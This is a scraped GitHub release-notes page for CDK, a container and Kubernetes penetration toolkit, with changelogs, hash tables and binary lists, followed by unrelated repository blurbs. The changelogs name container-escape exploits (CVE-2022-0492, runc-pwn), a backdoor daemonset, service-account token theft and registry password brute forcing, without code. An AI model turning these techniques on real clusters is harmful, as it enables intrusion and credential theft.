b92a34dfe966a9540d853cb5762574e659a33f965b532e453f5f0a2619505096|cdk_linux_arm64_thin|

    Contributor

    @neargle @404tk

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.2.0...v1.3.0

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.08 MB)
    cdk_linux_386(9.87 MB)
    cdk_linux_386_thin(4.88 MB)
    cdk_linux_386_thin_upx(2.07 MB)
    cdk_linux_386_upx(3.71 MB)
    cdk_linux_amd64(11.35 MB)
    cdk_linux_amd64_thin(5.78 MB)
    cdk_linux_amd64_thin_upx(2.24 MB)
    cdk_linux_amd64_upx(4.03 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.2.0(Jun 25, 2022)

    Release Date: 2022-06-25

    ☑️ Release a new version in the hospital 💊.

    What's Changed

    • add etcd get k8s token by @404tk in https://github.com/cdk-team/CDK/pull/52
    • perf(probe): output ending message by @neargle in https://github.com/cdk-team/CDK/pull/53
    • Fix #49 (shadow-apiserver): Flag --insecure-port has been deprecated by @neargle in https://github.com/cdk-team/CDK/pull/50

    New Contributors

    • @404tk made their first contribution in https://github.com/cdk-team/CDK/pull/52
    • Thanks to @路飞 for privately reporting a bug, we fixed it in #49

    :scroll: Changelog

    :bomb: Exploits

    • Feat(etcd) #52: get K8s service account token in ETCD

    :toolbox: Tools

    • Feat(etcd) #52: get K8s service account token in ETCD
    • Perf(probe): output ending message

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |139c41629e75329a9582b0a3ca07327a134860d4cc3686795a5fb69d09ee50aa|cdk_darwin_amd64 1ff183ed7b15612ef77d444187d44d2e1d76df09fa1762c24c54ab45440c77b9|cdk_linux_386 c8664d51b579d5922ab8325a777048d8d661baf2767744829becb979784f76d9|cdk_linux_386_thin eaa6c3fcb9e722d690183ae349ac2ca935aa9bcd2942f6f103fd8eb842dc5168|cdk_linux_386_thin_upx bb6ca78dc8a3774eb3db52580c52bc6b47ca885d9881f5cb422c915ca2c2a7a9|cdk_linux_386_upx 5f62f9a20546e50fcb59aedca67b9fd9252c1c026ef81649bd9eb7366c4376aa|cdk_linux_amd64 0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81|cdk_linux_amd64_thin eec9b210d157d0ef16e7238c21bf66c6dd4806471853c3e976927f7be14ab918|cdk_linux_amd64_thin_upx 131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a|cdk_linux_amd64_upx 39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2|cdk_linux_arm cca9d8bb94c36f2e971f834b980801d3fefd23fd8a25852867bb1be94d116963|cdk_linux_arm64 770e9e98e3ed07a224cbaf8fb78c5c9804b580f04470884cead4413616200621|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.05 MB)
    cdk_linux_386(9.84 MB)
    cdk_linux_386_thin(4.86 MB)
    cdk_linux_386_thin_upx(2.06 MB)
    cdk_linux_386_upx(3.70 MB)
    cdk_linux_amd64(11.33 MB)
    cdk_linux_amd64_thin(5.75 MB)
    cdk_linux_amd64_thin_upx(2.24 MB)
    cdk_linux_amd64_upx(4.02 MB)
    cdk_linux_arm(9.87 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.37 MB)
  • v1.1.1(Jun 12, 2022)

    Release Date: 2022-06-12

    :scroll: Changelog

    :bomb: Exploits

    • Fix #49(shadow-apiserver): Flag --insecure-port has been deprecated

    :toolbox: Tools

    • Fix(kcurl): more info for statuscode not in MaybeSuccessfulStatuscodeList

    :sparkles: Others

    • Fix(kcurl): more info for statuscode not in MaybeSuccessfulStatuscodeList
    • Fix #49(shadow-apiserver): Flag --insecure-port has been deprecated

    What's Changed

    • Fix #49 (shadow-apiserver): Flag --insecure-port has been deprecated by @neargle in https://github.com/cdk-team/CDK/pull/50

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.1.0...v1.1.1

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |9ee370e295cb26ad1b06650144941dc380888d48e0c1ae446cdae7e00e055e82|cdk_darwin_amd64 4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6|cdk_linux_386 697320ded8b271c975f6ff97a43eb7bc444cbe8648b8c5f34aa7652e14893306|cdk_linux_386_thin aa862e916af73e90f28c1407d5a411121cb33eeee5bf1bd2f130887b3dbdfd7f|cdk_linux_386_thin_upx 56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a|cdk_linux_386_upx 8880e4d7caf33e5da9a785d4c2da5bdcc6ba6315f882900f88c0adf1872e8fb8|cdk_linux_amd64 9ed6afef63c00c3c4d2eb6003922a872f0125639201fdf2f04ce3ab3b991d2be|cdk_linux_amd64_thin 336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c|cdk_linux_amd64_thin_upx 0956efa9072a03fddbe779da42e60df115e9d71bf9ac846ade8b751e4530b084|cdk_linux_amd64_upx f13668c26c13b4e0a8a56ffbc758331f311bcb033c1c74b1711a2258d6ed2e22|cdk_linux_arm fbebaaf3a90be35d2e00d1edf45b98799357f9321ff1b94ccfd2a22e44203052|cdk_linux_arm64 5d4d311ed2ab95bbd9698cbd26c83ce62ee9a665c462ef9f6fcee2406ab795c4|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.01 MB)
    cdk_linux_386(9.81 MB)
    cdk_linux_386_thin(4.73 MB)
    cdk_linux_386_thin_upx(2.01 MB)
    cdk_linux_386_upx(3.68 MB)
    cdk_linux_amd64(11.28 MB)
    cdk_linux_amd64_thin(5.59 MB)
    cdk_linux_amd64_thin_upx(2.17 MB)
    cdk_linux_amd64_upx(4.15 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.1.0(May 30, 2022)

    Release Date: 2022-05-30

    :scroll: Changelog

    :bomb: Exploits

    • Chore(usage): ocd and CDK in banner title
    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)
    • Fix #46 (exp): add "run" to 3 exp desc document
    • Fix(exp): runc-pwn error /proc/pid dir path
    • Fix #44 (exp): k8s-psp-dump check args error
    • Fix #45 (exp): check cmdline exclude cdk process
    • Chore(utils): remove same function with StringContains
    • Chore(exp & release): build mount cgroup only in linux

    :mag: About Evaluate

    • Add DNS-Based Service Discovery
    • Perf(log): colorful usage
    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)
    • Feat(evaluate): get current pid cgroup info

    :toolbox: Tools

    • Docs(LICENSE): to the Apache License v2 and add file header(K8s style)

    :sparkles: Others

    • Docs(thanks): add contrib rocks img in readme
    • Chore(github action): run Evaluate, Exploit and Tool for test
    • Add DNS-Based Service Discovery
    • Fix(opt): docopt parse error
    • Chroe(git): ignore vscode debug bin
    • Perf(log): colorful usage
    • Fix(action): del unnecessary build
    • Feat(evaluate): get current pid cgroup info
    • Fix(action): build cross-compiler in push & pull request
    • Chore(exp & release): build mount cgroup only in linux

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |78012b117e06baee37f32962d1dbd603b02231d7c4117c577765ecbc245842d6|cdk_darwin_amd64 f5b77a3b40d262907ae6c65822622a5d9852fcba0251b9ddc391e8e896ffec2b|cdk_linux_386 259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa|cdk_linux_386_thin e2c267e1e289e975e1a4a2acf13f30eb04dbb4a4da24daae02c248dbb199e919|cdk_linux_386_thin_upx a41520ae22cf2f079517745389a21e9f90df6376fb61bc4243808f8e494f08b1|cdk_linux_386_upx 32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55|cdk_linux_amd64 2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7|cdk_linux_amd64_thin b45f9a6c21f34801656affa29c1633288fe44f859a120c3e1a69d3880ce4f617|cdk_linux_amd64_thin_upx 3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20|cdk_linux_amd64_upx c346565a022b0f0c4957c33226e8b7a3d3359f8da8eeb97e60b50d6d3e1dea79|cdk_linux_arm 1392c9ae26021890c4fe0a3a960426da99e504d587b971408f40997d56e1ee63|cdk_linux_arm64 1416d3d651adeb29acbc825d7d537a379fdcb78102c36842a876dcf29e76c0e8|cdk_linux_arm64_thin|

    New Contributors

    • @wywwzjj made their first contribution in https://github.com/cdk-team/CDK/pull/48

    Full Changelog: https://github.com/cdk-team/CDK/compare/v1.0.6...v1.1.0

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(12.01 MB)
    cdk_linux_386(9.81 MB)
    cdk_linux_386_thin(4.73 MB)
    cdk_linux_386_thin_upx(2.01 MB)
    cdk_linux_386_upx(3.68 MB)
    cdk_linux_amd64(11.28 MB)
    cdk_linux_amd64_thin(5.59 MB)
    cdk_linux_amd64_thin_upx(2.17 MB)
    cdk_linux_amd64_upx(4.01 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.62 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.6(Mar 10, 2022)

    💣 Awesome CVE-2022-0492 Exploit!

    Release Date: 2022-03-10

    :scroll: Changelog

    :bomb: Exploits

    • Chore(exp & release): build mount cgroup only in linux
    • Fix(exp): unprivileged_userns_clone sysctl file do not exist in CentOS
    • Feat(exploit/abuse-unpriv-userns): exploit of CVE-2022-0492 (#41)
    • Feat(exp/mount_cgroup.go): completely fix #35 in golang-style
    • Fix #38 (exp): shim-pwn protobuf panic after run exploit

    :mag: About Evaluate

    • Feat(caps): find out add caps

    :sparkles: Others

    • Chore(cli): add version info & commit id for debug

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |b5fb2c18b9720d0bfc5f0d25a9922b6f0b88230e1005664885391ef140d7d489|cdk_darwin_amd64 371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4|cdk_linux_386 0bb79f2fe4c5f6d451822a26cff27b172270bce29d7430e01bebe904cde0c215|cdk_linux_386_thin fa7433173643095d5266fd465f88de45d6d157d72dc5915ab1334c03af63b4ba|cdk_linux_386_thin_upx 0976936c3c02be348ea926ce86c7204c7e9e59a092477e924c1a1d5bd97cfced|cdk_linux_386_upx eae7c7548d28517d099afef1bc7664f098bfa3c533ee5a0cf763ab28480ebeeb|cdk_linux_amd64 ebab27736848eb90409384d231b939702ce97482cc231aba7d0acf58e02db438|cdk_linux_amd64_thin 72f7e33c5313aa5ab15b99778b1f3c4d50d4710b171a635994d0d01e47e8173b|cdk_linux_amd64_thin_upx d697ea397da7603417baaf232512864bd8ecedde47dd199c2d32f653619f0f3b|cdk_linux_amd64_upx cdf9041ba0603c7d7452a2866eee0eaa115ad5d8488d92c1c388c36d321301b1|cdk_linux_arm 4f52fb4cf7dd744b01695e5356442182bc9fdb635da8f766537c12e0d83ad18f|cdk_linux_arm64 68080b2cbfd4488f96e0c315ea7e8bf6204de010a05eeb2da621f78caa7254b9|cdk_linux_arm64_thin|

    PR

    • Implement mount-cgroup in Golang style by kmahyyg in https://github.com/cdk-team/CDK/pull/40
    • feat(exploit/abuse_unpriv_userns.go): exploit of CVE-2022-0492 by kmahyyg in https://github.com/cdk-team/CDK/pull/41

    New Contributors

    • @kmahyyg made their first contribution in https://github.com/cdk-team/CDK/pull/40
    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.27 MB)
    cdk_linux_386(9.30 MB)
    cdk_linux_386_thin(4.58 MB)
    cdk_linux_386_thin_upx(1.93 MB)
    cdk_linux_386_upx(3.45 MB)
    cdk_linux_amd64(10.67 MB)
    cdk_linux_amd64_thin(5.40 MB)
    cdk_linux_amd64_thin_upx(2.09 MB)
    cdk_linux_amd64_upx(3.91 MB)
    cdk_linux_arm(9.31 MB)
    cdk_linux_arm64(10.00 MB)
    cdk_linux_arm64_thin(5.00 MB)
  • v1.0.5(Mar 6, 2022)

    💒 Happy wedding to my friend CDKKWANG, let's release a new version of CDK. 🌸 And fix some bugs by the way. Click to view more changelogs.

    Release Date: 2022-03-06

    :scroll: Changelog

    :bomb: Exploits

    • Fix #38 (exp): shim-pwn protobuf panic after run exploit

    :mag: About Evaluate

    • Feat(caps): find out add caps

    :sparkles: Others

    • Chore(cli): add version info & commit id for debug
    • Fix #38 (exp): shim-pwn protobuf panic after run exploit
    • Fix #37 (eva): add eva args to docopt
    • Chore: support for cdk eval
    • Feat(caps): find out add caps
    • Bump github.com/containerd/containerd from 1.4.11 to 1.4.12
    • Fix action: cedrickring/golang-action is archived, offical actions/setup-go action instead
    • Fix action: apply in all push and pull request
    • Bump github.com/tidwall/gjson from 1.6.7 to 1.9.3
    • Add event: https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
    • Github action: git build test after a new pull request and push

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf|cdk_darwin_amd64 91cd0a590f86cbda8e33e5a4d90303f270ed6d17b8b36e50030f5a68beb7a704|cdk_linux_386 31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80|cdk_linux_386_thin e30443b3f19aafa06b3edb124228f6ac35aa51737c3eb78fa007ffdce9d75bc5|cdk_linux_386_thin_upx aedb680859401bdea82e17109b9d6bb7ec6cfc26bf20687c14eea15c616efb52|cdk_linux_386_upx c68ea57d7555c49ef4c5ea05363fe0ced7978e751331ea949005d70fff000a00|cdk_linux_amd64 330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046|cdk_linux_amd64_thin a37e4ee0bb7651669d595d3bb44edd135f9d696648f36fb9e35af1e84ee6b795|cdk_linux_amd64_thin_upx 356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae|cdk_linux_amd64_upx 1b2c21dd0c747782c5b23b0ca390a23a17cb3fe437021c5f44e5d77d6b71f656|cdk_linux_arm 2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef|cdk_linux_arm64 a3995533605772461060559d6afae9de2726e86ef45a53bb924792fbe9baa325|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.98 MB)
    cdk_linux_386(9.77 MB)
    cdk_linux_386_thin(4.69 MB)
    cdk_linux_386_thin_upx(1.99 MB)
    cdk_linux_386_upx(3.67 MB)
    cdk_linux_amd64(11.23 MB)
    cdk_linux_amd64_thin(5.54 MB)
    cdk_linux_amd64_thin_upx(2.16 MB)
    cdk_linux_amd64_upx(4.14 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.4(Oct 2, 2021)

    Release Date: 2021-10-02

    :scroll: Changelog

    :bomb: Exploits

    • Fix DeployBackdoorDaemonset return true when error.
    • Fix build tag mistake in CapDacReadSearch Exploit
    • Better cap_dac_read_search exploit
    • Fix: http authorization token have blank string in prefix or subfix
    • Add force-fuzz option for k8s-psp-dump exploit
    • Add filter string for lxcfs-rw exploit

    :mag: About Evaluate

    • Fix DeployBackdoorDaemonset return true when error.

    :toolbox: Tools

    • Fix DeployBackdoorDaemonset return true when error.
    • Fix: http authorization token have blank string in prefix or subfix

    :sparkles: Others

    • Fix typo: KCON 2021 Arsenal
    • Add kcon2021 and whc2021
    • Format "run --list" output.
    • Add StringContains function
    • Add filter string for lxcfs-rw exploit
    • Bump github.com/containerd/containerd from 1.4.3 to 1.4.8

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |1acd7ea1364e9c78d271cc8341ae804e8a6e143d4c31103d6dd5424dbc80498a|cdk_darwin_amd64 2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac|cdk_linux_386 c042f360a6deff1b41405dd0f5bee637fc8242d585c714410084ef068a90d9fc|cdk_linux_386_thin ba69953f7e76cb9a1d4992fbb7db913284d265e7d32f6659dd3527874a473404|cdk_linux_386_thin_upx 35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7|cdk_linux_386_upx 07d53bb25aaa1b6ed1de40f0b8999be20a399172e49876cac3600503793df581|cdk_linux_amd64 9b1bcec7eb978a3412a5ec172181074837f08f4f9c256e8d9f6a8d7d2ce34d74|cdk_linux_amd64_thin 9e8a97e342f21509bdba9c4abfdefafe5b3a4fc60c046415ad397eca356e5d04|cdk_linux_amd64_thin_upx fde15f9ac15ce720fff310f70bf5d36843516dbda4d98c9bfbcdec6ce44f28e8|cdk_linux_amd64_upx a41c1b9b2b36e65dc1d8f57a08165289f44ed287893c18146fa32953bc2949fe|cdk_linux_arm 1d533c26001b29f11e09de0c350cab64faef97ea49a41f579d01b9ae74d2a0e9|cdk_linux_arm64 21582bab4103dda43821915b76e96870431e1f2f59bc0135ba4700008abdaa32|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(13.48 MB)
    cdk_linux_386(10.86 MB)
    cdk_linux_386_thin(4.69 MB)
    cdk_linux_386_thin_upx(1.99 MB)
    cdk_linux_386_upx(3.99 MB)
    cdk_linux_amd64(12.51 MB)
    cdk_linux_amd64_thin(5.54 MB)
    cdk_linux_amd64_thin_upx(2.16 MB)
    cdk_linux_amd64_upx(4.50 MB)
    cdk_linux_arm(10.75 MB)
    cdk_linux_arm64(11.68 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.3(Jul 8, 2021)

    Release Date: 2021-07-08

    :scroll: Changelog

    :bomb: Exploits

    • Add exploit: to container image registry, brute force the accounts and passwords cracking

    :sparkles: Others

    • Add document for brute force the accounts and passwords cracking
    • Add meta-data api url of ucloud PR #24
    • Auto changelog: move changelog generate code to bash script

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df|cdk_darwin_amd64 51093bb7f3a947ed390aa2a560dbe91621379ef2125582249a5769aa5a58b379|cdk_linux_386 f889cf4f3cf56e385114be1e91477a51f5022cafb7bcd5cfc8eb20704e82e9e0|cdk_linux_386_thin e01fee07234e35d11957d7ff65a5e2e7e0bac4a4ff061fd5b5d90a42701c1c49|cdk_linux_386_thin_upx bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41|cdk_linux_386_upx d2053465e2b96e8fb144090dd3cb1b7d02c1364f0d66eae234995c89c2f57c64|cdk_linux_amd64 bd3e5f1a848ec10158f529073a346f56c08a18c1e4cbfa1a85714037fe1561fe|cdk_linux_amd64_thin 4f188f89c92bb150c8b0b623d2041373b946a8920e97e464964ed79def029605|cdk_linux_amd64_thin_upx e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0|cdk_linux_amd64_upx d57859e45a603966302841da3a61fa3e604a2ddd7be8bb2f1feb9bde74464061|cdk_linux_arm 635640f232a519c71fbdd148bfef9ef8f9c61909106f2d458273fa07830b21ea|cdk_linux_arm64 d650309e0c7cefdb0fd5c2f29e30282d0d2f1be44fc389158c5d011a987245b4|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.95 MB)
    cdk_linux_386(9.75 MB)
    cdk_linux_386_thin(4.68 MB)
    cdk_linux_386_thin_upx(1.98 MB)
    cdk_linux_386_upx(3.66 MB)
    cdk_linux_amd64(11.21 MB)
    cdk_linux_amd64_thin(5.53 MB)
    cdk_linux_amd64_thin_upx(2.15 MB)
    cdk_linux_amd64_upx(4.12 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.2(Jun 17, 2021)

    Release Date: 2021-06-17

    :scroll: Changelog

    :bomb: Exploits

    • Add CAP_DAC_READ_SEARCH exploit
    • Fix error when target mountpoint is not a directory
    • Add SYS_ADMIN check and format capability output
    • Fix: truncation or EOF when reading target file
    • Various supplements to cap-dac-read-search

    :mag: About Evaluate

    • More infomations about available linux capabilities
    • Add SYS_ADMIN check and format capability output
    • Add check for CAP_SYS_MODULE and CAP_DAC_READ_SEARCH

    :sparkles: Others

    • Add meta-data api url of ucloud PR #24 from Alex-null/main
    • Auto changelog: move changelog generate code to bash script
    • Bash variables uppercase and add other changelogs
    • Changelog generation by automatic in github action
    • Add meta-data api url of Amazon Web Services Cloud
    • More infomations about available linux capabilities
    • Add check for CAP_SYS_MODULE and CAP_DAC_READ_SEARCH
    • Add check for OpenStack metadata
    • Add CAP_DAC_READ_SEARCH exploit
    • Update release note format

    :key: Hash Table

    |SHA256|EXECTUE FILE| |---|---| |c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc|cdk_darwin_amd64 05776513007563031e633e1e5820914bfdcac5df19fe7fc93be680df32f75362|cdk_linux_386 0c9a9c3ce08d379b81646f92d8cb90fbd3fb384e497a4388f4bc33f1c4c41a44|cdk_linux_386_thin 080b84e655682e3b4cd130b009a6c838a4c96ea147796cf216ffe3ebbaa256b1|cdk_linux_386_thin_upx f4e3039aaa1670e865d77746b6facb72dd3f72d8b240a972a6d48611b0ff4219|cdk_linux_386_upx f4f23d5b522d8f58e46963452ce15087bcff3955bbea95306e24433dfeacbd3a|cdk_linux_amd64 6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da|cdk_linux_amd64_thin d0a793ba054cb2ce81173cdfed434c511aec8c631a3597d9581c191bc1525c2e|cdk_linux_amd64_thin_upx bbae26473d5ca41404788c5b58ab495e9b7fdd988986657be0e0505400047207|cdk_linux_amd64_upx 11ae0608b6218b088dc3880ab366c93247bc33665a8a7f14b9da4d450e449dfe|cdk_linux_arm 3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a|cdk_linux_arm64 a89e428291b7d4d870e2f24564c86bdaed721131926eeae10602c5b86295466c|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.95 MB)
    cdk_linux_386(9.74 MB)
    cdk_linux_386_thin(4.67 MB)
    cdk_linux_386_thin_upx(1.98 MB)
    cdk_linux_386_upx(3.66 MB)
    cdk_linux_amd64(11.20 MB)
    cdk_linux_amd64_thin(5.52 MB)
    cdk_linux_amd64_thin_upx(2.15 MB)
    cdk_linux_amd64_upx(3.97 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.18 MB)
  • v1.0.1(Apr 14, 2021)

    Fixes

    • fit exploit k8s-backdoor-daemonset for k8s- for k8s version >1.8. #13 @greenhandatsjtu
    • fit exploit k8s-shadow-apiserver for Tencent Cloud TKE cluster.

    |sha256|exectue file| |---|---| |eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b|cdk_darwin_amd64 8956389a7a50dcf4b7ab221c1b91172e7f7fb298dbf43a8251abfb76334e7a4e|cdk_linux_386 67e7e9e8a9ae97ff4a2f1878746be4c10af64f43867d2e9ead31470145c689b8|cdk_linux_386_thin 72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2|cdk_linux_386_thin_upx 6efb691f0411b0e57b39c9efae1a55033cb8d5de3911d1ed120bf8787f395f1f|cdk_linux_386_upx 7fe4d08596fc13f16ed9bc29345a09a153e7e006bad88289836092bfc0e1ff1d|cdk_linux_amd64 db32aad6f38b4b0b38b65ba962eb9c256640324f01cef1d9e9eda4a32106a8a5|cdk_linux_amd64_thin 0674724cfc3997eacbac08e11b5b416a818b1dab5c6be50861babdbf84c376ad|cdk_linux_amd64_thin_upx 2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b|cdk_linux_amd64_upx d049e53c682c148dc71b1a794973ad8c782014f9f32836c72ad141d05d94f022|cdk_linux_arm 6bd11a9b68e81660518ccc9888cf6ea1f2d85c5bb33857f543298c2386e07bdf|cdk_linux_arm64 0f45809e1a640a7f54dd5211aff1b5239c310b0e81ddfb1244345ce6ec9d72e2|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.94 MB)
    cdk_linux_386(9.73 MB)
    cdk_linux_386_thin(4.66 MB)
    cdk_linux_386_thin_upx(1.97 MB)
    cdk_linux_386_upx(3.65 MB)
    cdk_linux_amd64(11.18 MB)
    cdk_linux_amd64_thin(5.50 MB)
    cdk_linux_amd64_thin_upx(2.14 MB)
    cdk_linux_amd64_upx(3.97 MB)
    cdk_linux_arm(9.75 MB)
    cdk_linux_arm64(10.50 MB)
    cdk_linux_arm64_thin(5.12 MB)
  • v1.0(Apr 11, 2021)

    New features

    • Make capabilities information readable.
    • Update cgroup and hostname capabilities in the evaluate module.
    • Update rewrite-cgroup-devices exploit to make it more stable.
    • More ports for k8s service probe.
    • Enable auto-pwn task.
    • New exploit: k8s-get-sa-token
    • New exploit: k8s-psp-dump
    • Release the thin version, now CDK can be easily used to pwn serverless/function service.
    • Use Github actions to compile and release.

    Fixes

    • HTTP header set twice in several exploits.
    • Wrong parameter output in k8s-backdoor-daemonset exploit.

    Release Date: 2021-04-11

    |sha256|exectue file| |---|---| |802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f|cdk_darwin_amd64 b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4|cdk_linux_386 6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186|cdk_linux_386_thin 350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5|cdk_linux_386_thin_upx dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad|cdk_linux_386_upx e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812|cdk_linux_amd64 0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1|cdk_linux_amd64_thin 752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560|cdk_linux_amd64_thin_upx 28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd|cdk_linux_amd64_upx cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7|cdk_linux_arm 42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302|cdk_linux_arm64 58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.91 MB)
    cdk_linux_386(9.71 MB)
    cdk_linux_386_thin(4.64 MB)
    cdk_linux_386_thin_upx(1.97 MB)
    cdk_linux_386_upx(3.64 MB)
    cdk_linux_amd64(11.16 MB)
    cdk_linux_amd64_thin(5.48 MB)
    cdk_linux_amd64_thin_upx(2.13 MB)
    cdk_linux_amd64_upx(4.10 MB)
    cdk_linux_arm(9.68 MB)
    cdk_linux_arm64(10.43 MB)
    cdk_linux_arm64_thin(5.12 MB)
  • v0.1.10(Feb 8, 2021)

  • v0.1.9(Jan 29, 2021)

  • v0.1.8(Jan 15, 2021)

  • v0.1.7(Dec 30, 2020)

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 Pre-Built Release https://github.com/ctrsploit/ctrsploit/releases Usage Quick-Start wg

null 42 Aug 29, 2022
Tpf2-tpnetmap-toolkit - A toolkit to create svg map images from TransportFever2 world data

tpf2-tpnetmap-toolkit TransportFever2 のワールドデータから svg のマップ画像を作成するツールキットです。 1. 導入方

Nosrith 1 Feb 17, 2022
Tool which gathers basic info from apk, which can be used for Android penetration testing.

APKSEC Tool which gathers basic info from apk, which can be used for Android penetration testing. REQUIREMENTS AND INSTALLATION Build APKSEC: git clon

Jayateertha Guruprasad 3 Sep 2, 2022
Moby Project - a collaborative project for the container ecosystem to assemble container-based systems

The Moby Project Moby is an open-source project created by Docker to enable and accelerate software containerization. It provides a "Lego set" of tool

Moby 64.1k Sep 17, 2022
Boxygen is a container as code framework that allows you to build container images from code

Boxygen is a container as code framework that allows you to build container images from code, allowing integration of container image builds into other tooling such as servers or CLI tooling.

nitric 5 Dec 13, 2021
Amazon ECS Container Agent: a component of Amazon Elastic Container Service

Amazon ECS Container Agent The Amazon ECS Container Agent is a component of Amazon Elastic Container Service (Amazon ECS) and is responsible for manag

null 0 Dec 28, 2021
The Container Storage Interface (CSI) Driver for Fortress Block Storage This driver allows you to use Fortress Block Storage with your container orchestrator

fortress-csi The Container Storage Interface (CSI) Driver for Fortress Block Storage This driver allows you to use Fortress Block Storage with your co

Fortress 0 Jan 23, 2022
Grafana Tempo is a high volume, minimal dependency distributed tracing backend.

Grafana Tempo is an open source, easy-to-use and high-scale distributed tracing backend. Tempo is cost-efficient, requiring only object storage to ope

Grafana Labs 2.3k Sep 26, 2022
Dependency management solution for Hashicorp Terraform modules

TERRADEP This is the module dependency solution for implementing terraform's modules dependency. Using this, users can now manage dependencies both fr

Tejaswi Kasat 1 Dec 21, 2021
Show dependency graph of docker images/containers

docker-graph Show dependency graph of docker images/containers like this: Orange is images and green is containers. Features Collect docker images, co

Tomohisa Hirami 0 Feb 7, 2022
Samantha 0 Feb 12, 2022
concurrent, cache-efficient, and Dockerfile-agnostic builder toolkit

BuildKit BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Key features: Automati

